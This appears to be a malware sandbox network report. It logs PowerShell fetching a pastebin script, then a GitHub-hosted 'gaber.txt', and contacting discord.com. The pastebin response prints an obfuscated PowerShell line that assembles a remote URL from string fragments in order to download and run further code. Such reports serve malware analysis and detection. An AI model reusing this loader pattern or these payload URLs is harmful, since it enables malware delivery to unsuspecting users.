Oct 15, 2024 17:58:16.954859018 CEST | 49708 | 443 | 192.168.2.8 | 185.199.110.133
Oct 15, 2024 17:58:16.955466032 CEST | 49710 | 443 | 192.168.2.8 | 162.159.136.232
Oct 15, 2024 17:58:16.955486059 CEST | 443 | 49710 | 162.159.136.232 | 192.168.2.8
Oct 15, 2024 17:58:16.955799103 CEST | 443 | 49710 | 162.159.136.232 | 192.168.2.8
Oct 15, 2024 17:58:16.965747118 CEST | 49710 | 443 | 192.168.2.8 | 162.159.136.232
Oct 15, 2024 17:58:16.999413013 CEST | 443 | 49708 | 185.199.110.133 | 192.168.2.8
Oct 15, 2024 17:58:17.007400036 CEST | 443 | 49710 | 162.159.136.232 | 192.168.2.8
Oct 15, 2024 17:58:17.086805105 CEST | 443 | 49708 | 185.199.110.133 | 192.168.2.8
Oct 15, 2024 17:58:17.086994886 CEST | 443 | 49708 | 185.199.110.133 | 192.168.2.8
Oct 15, 2024 17:58:17.087028027 CEST | 443 | 49708 | 185.199.110.133 | 192.168.2.8
Oct 15, 2024 17:58:17.087038040 CEST | 49708 | 443 | 192.168.2.8 | 185.199.110.133
Oct 15, 2024 17:58:17.087048054 CEST | 443 | 49708 | 185.199.110.133 | 192.168.2.8
Oct 15, 2024 17:58:17.087084055 CEST | 49708 | 443 | 192.168.2.8 | 185.199.110.133
Oct 15, 2024 17:58:17.087089062 CEST | 443 | 49708 | 185.199.110.133 | 192.168.2.8
Oct 15, 2024 17:58:17.087697029 CEST | 443 | 49708 | 185.199.110.133 | 192.168.2.8
Oct 15, 2024 17:58:17.087754965 CEST | 49708 | 443 | 192.168.2.8 | 185.199.110.133
Oct 15, 2024 17:58:17.087763071 CEST | 443 | 49708 | 185.199.110.133 | 192.168.2.8
Oct 15, 2024 17:58:17.094564915 CEST | 443 | 49708 | 185.199.110.133 | 192.168.2.8
Oct 15, 2024 17:58:17.094623089 CEST | 49708 | 443 | 192.168.2.8 | 185.199.110.133
Oct 15, 2024 17:58:17.096853971 CEST | 443 | 49710 | 162.159.136.232 | 192.168.2.8
Oct 15, 2024 17:58:17.097289085 CEST | 49710 | 443 | 192.168.2.8 | 162.159.136.232
Oct 15, 2024 17:58:17.097316980 CEST | 443 | 49710 | 162.159.136.232 | 192.168.2.8
Oct 15, 2024 17:58:17.118233919 CEST | 49708 | 443 | 192.168.2.8 | 185.199.110.133
Oct 15, 2024 17:58:17.350953102 CEST | 443 | 49710 | 162.159.136.232 | 192.168.2.8
Oct 15, 2024 17:58:17.351068020 CEST | 443 | 49710 | 162.159.136.232 | 192.168.2.8
Oct 15, 2024 17:58:17.351130009 CEST | 49710 | 443 | 192.168.2.8 | 162.159.136.232
Oct 15, 2024 17:58:17.521847010 CEST | 49710 | 443 | 192.168.2.8 | 162.159.136.232
Oct 15, 2024 17:58:20.789887905 CEST | 49713 | 80 | 192.168.2.8 | 104.20.3.235
Oct 15, 2024 17:58:20.794877052 CEST | 80 | 49713 | 104.20.3.235 | 192.168.2.8
Oct 15, 2024 17:58:20.794972897 CEST | 49713 | 80 | 192.168.2.8 | 104.20.3.235
Oct 15, 2024 17:58:20.797343016 CEST | 49713 | 80 | 192.168.2.8 | 104.20.3.235
Oct 15, 2024 17:58:20.802184105 CEST | 80 | 49713 | 104.20.3.235 | 192.168.2.8
Oct 15, 2024 17:58:21.449625015 CEST | 80 | 49713 | 104.20.3.235 | 192.168.2.8
Oct 15, 2024 17:58:21.453087091 CEST | 49714 | 443 | 192.168.2.8 | 104.20.3.235
Oct 15, 2024 17:58:21.453128099 CEST | 443 | 49714 | 104.20.3.235 | 192.168.2.8
Oct 15, 2024 17:58:21.453206062 CEST | 49714 | 443 | 192.168.2.8 | 104.20.3.235
Oct 15, 2024 17:58:21.457109928 CEST | 49714 | 443 | 192.168.2.8 | 104.20.3.235
Oct 15, 2024 17:58:21.457129002 CEST | 443 | 49714 | 104.20.3.235 | 192.168.2.8
Oct 15, 2024 17:58:21.500818014 CEST | 49713 | 80 | 192.168.2.8 | 104.20.3.235
Oct 15, 2024 17:58:22.112907887 CEST | 443 | 49714 | 104.20.3.235 | 192.168.2.8
Oct 15, 2024 17:58:22.112998962 CEST | 49714 | 443 | 192.168.2.8 | 104.20.3.235
Oct 15, 2024 17:58:22.114731073 CEST | 49714 | 443 | 192.168.2.8 | 104.20.3.235
Oct 15, 2024 17:58:22.114738941 CEST | 443 | 49714 | 104.20.3.235 | 192.168.2.8
Oct 15, 2024 17:58:22.114964962 CEST | 443 | 49714 | 104.20.3.235 | 192.168.2.8
Oct 15, 2024 17:58:22.121062040 CEST | 49714 | 443 | 192.168.2.8 | 104.20.3.235
Oct 15, 2024 17:58:22.167413950 CEST | 443 | 49714 | 104.20.3.235 | 192.168.2.8
Oct 15, 2024 17:58:22.289086103 CEST | 443 | 49714 | 104.20.3.235 | 192.168.2.8
Oct 15, 2024 17:58:22.289172888 CEST | 443 | 49714 | 104.20.3.235 | 192.168.2.8
Oct 15, 2024 17:58:22.289242983 CEST | 49714 | 443 | 192.168.2.8 | 104.20.3.235
Oct 15, 2024 17:58:22.310338020 CEST | 49714 | 443 | 192.168.2.8 | 104.20.3.235
Oct 15, 2024 17:58:22.326874971 CEST | 49715 | 80 | 192.168.2.8 | 185.199.110.133
Oct 15, 2024 17:58:22.331729889 CEST | 80 | 49715 | 185.199.110.133 | 192.168.2.8
Oct 15, 2024 17:58:22.331799030 CEST | 49715 | 80 | 192.168.2.8 | 185.199.110.133
Oct 15, 2024 17:58:22.332072020 CEST | 49715 | 80 | 192.168.2.8 | 185.199.110.133
Oct 15, 2024 17:58:22.336801052 CEST | 80 | 49715 | 185.199.110.133 | 192.168.2.8
Oct 15, 2024 17:58:22.963156939 CEST | 80 | 49715 | 185.199.110.133 | 192.168.2.8
Oct 15, 2024 17:58:22.963562965 CEST | 49715 | 80 | 192.168.2.8 | 185.199.110.133
Oct 15, 2024 17:58:22.964468956 CEST | 49716 | 443 | 192.168.2.8 | 185.199.110.133
Oct 15, 2024 17:58:22.964514017 CEST | 443 | 49716 | 185.199.110.133 | 192.168.2.8
Oct 15, 2024 17:58:22.964620113 CEST | 49716 | 443 | 192.168.2.8 | 185.199.110.133
Oct 15, 2024 17:58:22.964874029 CEST | 49716 | 443 | 192.168.2.8 | 185.199.110.133
Oct 15, 2024 17:58:22.964890003 CEST | 443 | 49716 | 185.199.110.133 | 192.168.2.8
Oct 15, 2024 17:58:22.969491959 CEST | 80 | 49715 | 185.199.110.133 | 192.168.2.8
Oct 15, 2024 17:58:22.969564915 CEST | 49715 | 80 | 192.168.2.8 | 185.199.110.133
Oct 15, 2024 17:58:23.596985102 CEST | 443 | 49716 | 185.199.110.133 | 192.168.2.8
Oct 15, 2024 17:58:23.597054958 CEST | 49716 | 443 | 192.168.2.8 | 185.199.110.133
Oct 15, 2024 17:58:23.599991083 CEST | 49716 | 443 | 192.168.2.8 | 185.199.110.133
Oct 15, 2024 17:58:23.600004911 CEST | 443 | 49716 | 185.199.110.133 | 192.168.2.8
Oct 15, 2024 17:58:23.600267887 CEST | 443 | 49716 | 185.199.110.133 | 192.168.2.8
Oct 15, 2024 17:58:23.601700068 CEST | 49716 | 443 | 192.168.2.8 | 185.199.110.133
Oct 15, 2024 17:58:23.643426895 CEST | 443 | 49716 | 185.199.110.133 | 192.168.2.8
Oct 15, 2024 17:58:23.773091078 CEST | 443 | 49716 | 185.199.110.133 | 192.168.2.8
Oct 15, 2024 17:58:23.773304939 CEST | 443 | 49716 | 185.199.110.133 | 192.168.2.8
Oct 15, 2024 17:58:23.773461103 CEST | 443 | 49716 | 185.199.110.133 | 192.168.2.8
Oct 15, 2024 17:58:23.773518085 CEST | 49716 | 443 | 192.168.2.8 | 185.199.110.133
Oct 15, 2024 17:58:23.773534060 CEST | 443 | 49716 | 185.199.110.133 | 192.168.2.8
Oct 15, 2024 17:58:23.773613930 CEST | 443 | 49716 | 185.199.110.133 | 192.168.2.8
Oct 15, 2024 17:58:23.773659945 CEST | 49716 | 443 | 192.168.2.8 | 185.199.110.133
Oct 15, 2024 17:58:23.773665905 CEST | 443 | 49716 | 185.199.110.133 | 192.168.2.8
Oct 15, 2024 17:58:23.773704052 CEST | 49716 | 443 | 192.168.2.8 | 185.199.110.133
Oct 15, 2024 17:58:23.773713112 CEST | 443 | 49716 | 185.199.110.133 | 192.168.2.8
Oct 15, 2024 17:58:23.773868084 CEST | 443 | 49716 | 185.199.110.133 | 192.168.2.8
Oct 15, 2024 17:58:23.773917913 CEST | 49716 | 443 | 192.168.2.8 | 185.199.110.133
Oct 15, 2024 17:58:23.826637983 CEST | 49716 | 443 | 192.168.2.8 | 185.199.110.133
Oct 15, 2024 17:58:29.574425936 CEST | 49717 | 443 | 192.168.2.8 | 162.159.136.232
Oct 15, 2024 17:58:29.574469090 CEST | 443 | 49717 | 162.159.136.232 | 192.168.2.8
Oct 15, 2024 17:58:29.574523926 CEST | 49717 | 443 | 192.168.2.8 | 162.159.136.232
Oct 15, 2024 17:58:29.575009108 CEST | 49717 | 443 | 192.168.2.8 | 162.159.136.232
Oct 15, 2024 17:58:29.575021982 CEST | 443 | 49717 | 162.159.136.232 | 192.168.2.8
Oct 15, 2024 17:58:30.191226006 CEST | 443 | 49717 | 162.159.136.232 | 192.168.2.8
Oct 15, 2024 17:58:30.191457033 CEST | 49717 | 443 | 192.168.2.8 | 162.159.136.232
Oct 15, 2024 17:58:30.192918062 CEST | 49717 | 443 | 192.168.2.8 | 162.159.136.232
Oct 15, 2024 17:58:30.192926884 CEST | 443 | 49717 | 162.159.136.232 | 192.168.2.8
Oct 15, 2024 17:58:30.193176985 CEST | 443 | 49717 | 162.159.136.232 | 192.168.2.8
Oct 15, 2024 17:58:30.194622040 CEST | 49717 | 443 | 192.168.2.8 | 162.159.136.232
Oct 15, 2024 17:58:30.235411882 CEST | 443 | 49717 | 162.159.136.232 | 192.168.2.8
Oct 15, 2024 17:58:30.235496044 CEST | 49717 | 443 | 192.168.2.8 | 162.159.136.232
Oct 15, 2024 17:58:30.235513926 CEST | 443 | 49717 | 162.159.136.232 | 192.168.2.8
Oct 15, 2024 17:58:30.423333883 CEST | 443 | 49717 | 162.159.136.232 | 192.168.2.8
Oct 15, 2024 17:58:30.423414946 CEST | 443 | 49717 | 162.159.136.232 | 192.168.2.8
Oct 15, 2024 17:58:30.423458099 CEST | 49717 | 443 | 192.168.2.8 | 162.159.136.232
Oct 15, 2024 17:58:30.478245974 CEST | 49717 | 443 | 192.168.2.8 | 162.159.136.232
Oct 15, 2024 17:58:35.829056025 CEST | 49704 | 80 | 192.168.2.8 | 104.20.3.235
Oct 15, 2024 17:58:36.200531960 CEST | 49718 | 443 | 192.168.2.8 | 162.159.136.232
Oct 15, 2024 17:58:36.200562954 CEST | 443 | 49718 | 162.159.136.232 | 192.168.2.8
Oct 15, 2024 17:58:36.200623989 CEST | 49718 | 443 | 192.168.2.8 | 162.159.136.232
Oct 15, 2024 17:58:36.201046944 CEST | 49718 | 443 | 192.168.2.8 | 162.159.136.232
Oct 15, 2024 17:58:36.201056957 CEST | 443 | 49718 | 162.159.136.232 | 192.168.2.8
Oct 15, 2024 17:58:36.810528040 CEST | 443 | 49718 | 162.159.136.232 | 192.168.2.8
Oct 15, 2024 17:58:36.810653925 CEST | 49718 | 443 | 192.168.2.8 | 162.159.136.232
Oct 15, 2024 17:58:36.812015057 CEST | 49718 | 443 | 192.168.2.8 | 162.159.136.232
Oct 15, 2024 17:58:36.812025070 CEST | 443 | 49718 | 162.159.136.232 | 192.168.2.8
Oct 15, 2024 17:58:36.812313080 CEST | 443 | 49718 | 162.159.136.232 | 192.168.2.8
Oct 15, 2024 17:58:36.813334942 CEST | 49718 | 443 | 192.168.2.8 | 162.159.136.232
Oct 15, 2024 17:58:36.859400988 CEST | 443 | 49718 | 162.159.136.232 | 192.168.2.8
Oct 15, 2024 17:58:36.859466076 CEST | 49718 | 443 | 192.168.2.8 | 162.159.136.232
Oct 15, 2024 17:58:36.859476089 CEST | 443 | 49718 | 162.159.136.232 | 192.168.2.8
Oct 15, 2024 17:58:37.042201996 CEST | 443 | 49718 | 162.159.136.232 | 192.168.2.8
Oct 15, 2024 17:58:37.042287111 CEST | 443 | 49718 | 162.159.136.232 | 192.168.2.8
Oct 15, 2024 17:58:37.042340994 CEST | 49718 | 443 | 192.168.2.8 | 162.159.136.232
Oct 15, 2024 17:58:37.044667006 CEST | 49718 | 443 | 192.168.2.8 | 162.159.136.232
Oct 15, 2024 17:58:42.073621035 CEST | 49713 | 80 | 192.168.2.8 | 104.20.3.235
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 15, 2024 17:58:13.067572117 CEST | 61987 | 53 | 192.168.2.8 | 1.1.1.1
Oct 15, 2024 17:58:13.074807882 CEST | 53 | 61987 | 1.1.1.1 | 192.168.2.8
Oct 15, 2024 17:58:14.895296097 CEST | 52280 | 53 | 192.168.2.8 | 1.1.1.1
Oct 15, 2024 17:58:14.902323961 CEST | 53 | 52280 | 1.1.1.1 | 192.168.2.8
Oct 15, 2024 17:58:15.780414104 CEST | 54420 | 53 | 192.168.2.8 | 1.1.1.1
Oct 15, 2024 17:58:15.788535118 CEST | 53 | 54420 | 1.1.1.1 | 192.168.2.8
Oct 15, 2024 17:58:31.673584938 CEST | 53078 | 53 | 192.168.2.8 | 1.1.1.1
Oct 15, 2024 17:58:31.680960894 CEST | 53 | 53078 | 1.1.1.1 | 192.168.2.8
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Oct 15, 2024 17:58:13.067572117 CEST | 192.168.2.8 | 1.1.1.1 | 0x2c4f | Standard query (0) | pastebin.com | A (IP address) | IN (0x0001) | false
Oct 15, 2024 17:58:14.895296097 CEST | 192.168.2.8 | 1.1.1.1 | 0x3d46 | Standard query (0) | raw.githubusercontent.com | A (IP address) | IN (0x0001) | false
Oct 15, 2024 17:58:15.780414104 CEST | 192.168.2.8 | 1.1.1.1 | 0xa7db | Standard query (0) | discord.com | A (IP address) | IN (0x0001) | false
Oct 15, 2024 17:58:31.673584938 CEST | 192.168.2.8 | 1.1.1.1 | 0xcf20 | Standard query (0) | discord.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Oct 15, 2024 17:58:13.074807882 CEST | 1.1.1.1 | 192.168.2.8 | 0x2c4f | No error (0) | pastebin.com | | 104.20.3.235 | A (IP address) | IN (0x0001) | false
Oct 15, 2024 17:58:13.074807882 CEST | 1.1.1.1 | 192.168.2.8 | 0x2c4f | No error (0) | pastebin.com | | 104.20.4.235 | A (IP address) | IN (0x0001) | false
Oct 15, 2024 17:58:13.074807882 CEST | 1.1.1.1 | 192.168.2.8 | 0x2c4f | No error (0) | pastebin.com | | 172.67.19.24 | A (IP address) | IN (0x0001) | false
Oct 15, 2024 17:58:14.902323961 CEST | 1.1.1.1 | 192.168.2.8 | 0x3d46 | No error (0) | raw.githubusercontent.com | | 185.199.110.133 | A (IP address) | IN (0x0001) | false
Oct 15, 2024 17:58:14.902323961 CEST | 1.1.1.1 | 192.168.2.8 | 0x3d46 | No error (0) | raw.githubusercontent.com | | 185.199.108.133 | A (IP address) | IN (0x0001) | false
Oct 15, 2024 17:58:14.902323961 CEST | 1.1.1.1 | 192.168.2.8 | 0x3d46 | No error (0) | raw.githubusercontent.com | | 185.199.111.133 | A (IP address) | IN (0x0001) | false
Oct 15, 2024 17:58:14.902323961 CEST | 1.1.1.1 | 192.168.2.8 | 0x3d46 | No error (0) | raw.githubusercontent.com | | 185.199.109.133 | A (IP address) | IN (0x0001) | false
Oct 15, 2024 17:58:15.788535118 CEST | 1.1.1.1 | 192.168.2.8 | 0xa7db | No error (0) | discord.com | | 162.159.136.232 | A (IP address) | IN (0x0001) | false
Oct 15, 2024 17:58:15.788535118 CEST | 1.1.1.1 | 192.168.2.8 | 0xa7db | No error (0) | discord.com | | 162.159.137.232 | A (IP address) | IN (0x0001) | false
Oct 15, 2024 17:58:15.788535118 CEST | 1.1.1.1 | 192.168.2.8 | 0xa7db | No error (0) | discord.com | | 162.159.128.233 | A (IP address) | IN (0x0001) | false
Oct 15, 2024 17:58:15.788535118 CEST | 1.1.1.1 | 192.168.2.8 | 0xa7db | No error (0) | discord.com | | 162.159.135.232 | A (IP address) | IN (0x0001) | false
Oct 15, 2024 17:58:15.788535118 CEST | 1.1.1.1 | 192.168.2.8 | 0xa7db | No error (0) | discord.com | | 162.159.138.232 | A (IP address) | IN (0x0001) | false
Oct 15, 2024 17:58:31.680960894 CEST | 1.1.1.1 | 192.168.2.8 | 0xcf20 | No error (0) | discord.com | | 162.159.137.232 | A (IP address) | IN (0x0001) | false
Oct 15, 2024 17:58:31.680960894 CEST | 1.1.1.1 | 192.168.2.8 | 0xcf20 | No error (0) | discord.com | | 162.159.136.232 | A (IP address) | IN (0x0001) | false
Oct 15, 2024 17:58:31.680960894 CEST | 1.1.1.1 | 192.168.2.8 | 0xcf20 | No error (0) | discord.com | | 162.159.128.233 | A (IP address) | IN (0x0001) | false
Oct 15, 2024 17:58:31.680960894 CEST | 1.1.1.1 | 192.168.2.8 | 0xcf20 | No error (0) | discord.com | | 162.159.138.232 | A (IP address) | IN (0x0001) | false
Oct 15, 2024 17:58:31.680960894 CEST | 1.1.1.1 | 192.168.2.8 | 0xcf20 | No error (0) | discord.com | | 162.159.135.232 | A (IP address) | IN (0x0001) | false
                                                            • pastebin.com
                                                            • raw.githubusercontent.com
                                                            • discord.com
                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            0 | 192.168.2.8 | 49704 | 104.20.3.235 | 80 | 5180 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Oct 15, 2024 17:58:13.101649046 CEST | 169 | OUT | GET /raw/sA04Mwk2 HTTP/1.1
                                                            User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                            Host: pastebin.com
                                                            Connection: Keep-Alive
                                                            Oct 15, 2024 17:58:13.699625969 CEST | 472 | IN | HTTP/1.1 301 Moved Permanently
                                                            Date: Tue, 15 Oct 2024 15:58:13 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 167
                                                            Connection: keep-alive
                                                            Cache-Control: max-age=3600
                                                            Expires: Tue, 15 Oct 2024 16:58:13 GMT
                                                            Location: https://pastebin.com/raw/sA04Mwk2
                                                            Server: cloudflare
                                                            CF-RAY: 8d3102672a6ce84f-DFW
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            1 | 192.168.2.8 | 49706 | 185.199.110.133 | 80 | 5180 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Oct 15, 2024 17:58:14.917721987 CEST | 222 | OUT | GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1
                                                            User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                            Host: raw.githubusercontent.com
                                                            Connection: Keep-Alive
                                                            Oct 15, 2024 17:58:15.502379894 CEST | 541 | IN | HTTP/1.1 301 Moved Permanently
                                                            Connection: close
                                                            Content-Length: 0
                                                            Server: Varnish
                                                            Retry-After: 0
                                                            Location: https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                            Accept-Ranges: bytes
                                                            Date: Tue, 15 Oct 2024 15:58:15 GMT
                                                            Via: 1.1 varnish
                                                            X-Served-By: cache-dfw-kdal2120102-DFW
                                                            X-Cache: HIT
                                                            X-Cache-Hits: 0
                                                            X-Timer: S1729007895.446821,VS0,VE0
                                                            Access-Control-Allow-Origin: *
                                                            Cross-Origin-Resource-Policy: cross-origin
                                                            Expires: Tue, 15 Oct 2024 16:03:15 GMT
                                                            Vary: Authorization,Accept-Encoding


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            2 | 192.168.2.8 | 49713 | 104.20.3.235 | 80 | 2716 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Oct 15, 2024 17:58:20.797343016 CEST | 169 | OUT | GET /raw/sA04Mwk2 HTTP/1.1
                                                            User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                            Host: pastebin.com
                                                            Connection: Keep-Alive
                                                            Oct 15, 2024 17:58:21.449625015 CEST | 472 | IN | HTTP/1.1 301 Moved Permanently
                                                            Date: Tue, 15 Oct 2024 15:58:21 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 167
                                                            Connection: keep-alive
                                                            Cache-Control: max-age=3600
                                                            Expires: Tue, 15 Oct 2024 16:58:21 GMT
                                                            Location: https://pastebin.com/raw/sA04Mwk2
                                                            Server: cloudflare
                                                            CF-RAY: 8d3102979e5d2e67-DFW
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            3 | 192.168.2.8 | 49715 | 185.199.110.133 | 80 | 2716 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Oct 15, 2024 17:58:22.332072020 CEST | 222 | OUT | GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1
                                                            User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                            Host: raw.githubusercontent.com
                                                            Connection: Keep-Alive
                                                            Oct 15, 2024 17:58:22.963156939 CEST | 541 | IN | HTTP/1.1 301 Moved Permanently
                                                            Connection: close
                                                            Content-Length: 0
                                                            Server: Varnish
                                                            Retry-After: 0
                                                            Location: https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                            Accept-Ranges: bytes
                                                            Date: Tue, 15 Oct 2024 15:58:22 GMT
                                                            Via: 1.1 varnish
                                                            X-Served-By: cache-dfw-kdal2120111-DFW
                                                            X-Cache: HIT
                                                            X-Cache-Hits: 0
                                                            X-Timer: S1729007903.899840,VS0,VE0
                                                            Access-Control-Allow-Origin: *
                                                            Cross-Origin-Resource-Policy: cross-origin
                                                            Expires: Tue, 15 Oct 2024 16:03:22 GMT
                                                            Vary: Authorization,Accept-Encoding


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            0 | 192.168.2.8 | 49705 | 104.20.3.235 | 443 | 5180 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            2024-10-15 15:58:14 UTC | 169 | OUT | GET /raw/sA04Mwk2 HTTP/1.1
                                                            User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                            Host: pastebin.com
                                                            Connection: Keep-Alive
                                                            2024-10-15 15:58:14 UTC | 396 | IN | HTTP/1.1 200 OK
                                                            Date: Tue, 15 Oct 2024 15:58:14 GMT
                                                            Content-Type: text/plain; charset=utf-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            x-frame-options: DENY
                                                            x-content-type-options: nosniff
                                                            x-xss-protection: 1;mode=block
                                                            cache-control: public, max-age=1801
                                                            CF-Cache-Status: HIT
                                                            Age: 13
                                                            Last-Modified: Tue, 15 Oct 2024 15:58:01 GMT
                                                            Server: cloudflare
                                                            CF-RAY: 8d31026dbb34eaa0-DFW
                                                            2024-10-15 15:58:14 UTC | 139 | IN | Data Raw: 38 35 0d 0a 63 61 6c 6c 69 54 28 57 49 4e 44 4f 57 53 5f 4e 54 20 28 22 72 61 77 2e 67 69 22 2b 22 74 68 75 62 22 2b 22 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 22 2b 22 6f 6d 2f 4e 65 22 2b 22 74 68 33 4e 2f 6e 61 39 6f 77 33 34 39 35 72 61 79 67 77 69 34 22 2b 22 67 79 72 68 75 61 77 65 72 61 77 65 72 61 2f 6d 61 69 6e 2f 67 61 62 65 72 2e 74 78 74 22 29 20 2d 75 73 65 62 61 73 69 63 70 61 72 73 69 6e 67 29 0d 0a
                                                            Data Ascii: 85calliT(WINDOWS_NT ("raw.gi"+"thub"+"usercontent.c"+"om/Ne"+"th3N/na9ow3495raygwi4"+"gyrhuawerawera/main/gaber.txt") -usebasicparsing)
                                                            2024-10-15 15:58:14 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            1 | 192.168.2.8 | 49708 | 185.199.110.133 | 443 | 5180 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            2024-10-15 15:58:16 UTC | 222 | OUT | GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1
                                                            User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                            Host: raw.githubusercontent.com
                                                            Connection: Keep-Alive
                                                            2024-10-15 15:58:17 UTC | 900 | IN | HTTP/1.1 200 OK
                                                            Connection: close
                                                            Content-Length: 7508
                                                            Cache-Control: max-age=300
                                                            Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                            Content-Type: text/plain; charset=utf-8
                                                            ETag: "3c1076fda9d7a9f1de3ceb011a6f68a3886388e35b154b66990b49e988bc5cbd"
                                                            Strict-Transport-Security: max-age=31536000
                                                            X-Content-Type-Options: nosniff
                                                            X-Frame-Options: deny
                                                            X-XSS-Protection: 1; mode=block
                                                            X-GitHub-Request-Id: 47F7:29E79C:808B02:8D3F30:670E7B3C
                                                            Accept-Ranges: bytes
                                                            Date: Tue, 15 Oct 2024 15:58:17 GMT
                                                            Via: 1.1 varnish
                                                            X-Served-By: cache-dfw-kdal2120097-DFW
                                                            X-Cache: HIT
                                                            X-Cache-Hits: 1
                                                            X-Timer: S1729007897.026321,VS0,VE1
                                                            Vary: Authorization,Accept-Encoding,Origin
                                                            Access-Control-Allow-Origin: *
                                                            Cross-Origin-Resource-Policy: cross-origin
                                                            X-Fastly-Request-ID: 5c8f6b3b2596dd0d27bde73de5aa2b7d7554c0db
                                                            Expires: Tue, 15 Oct 2024 16:03:17 GMT
                                                            Source-Age: 196
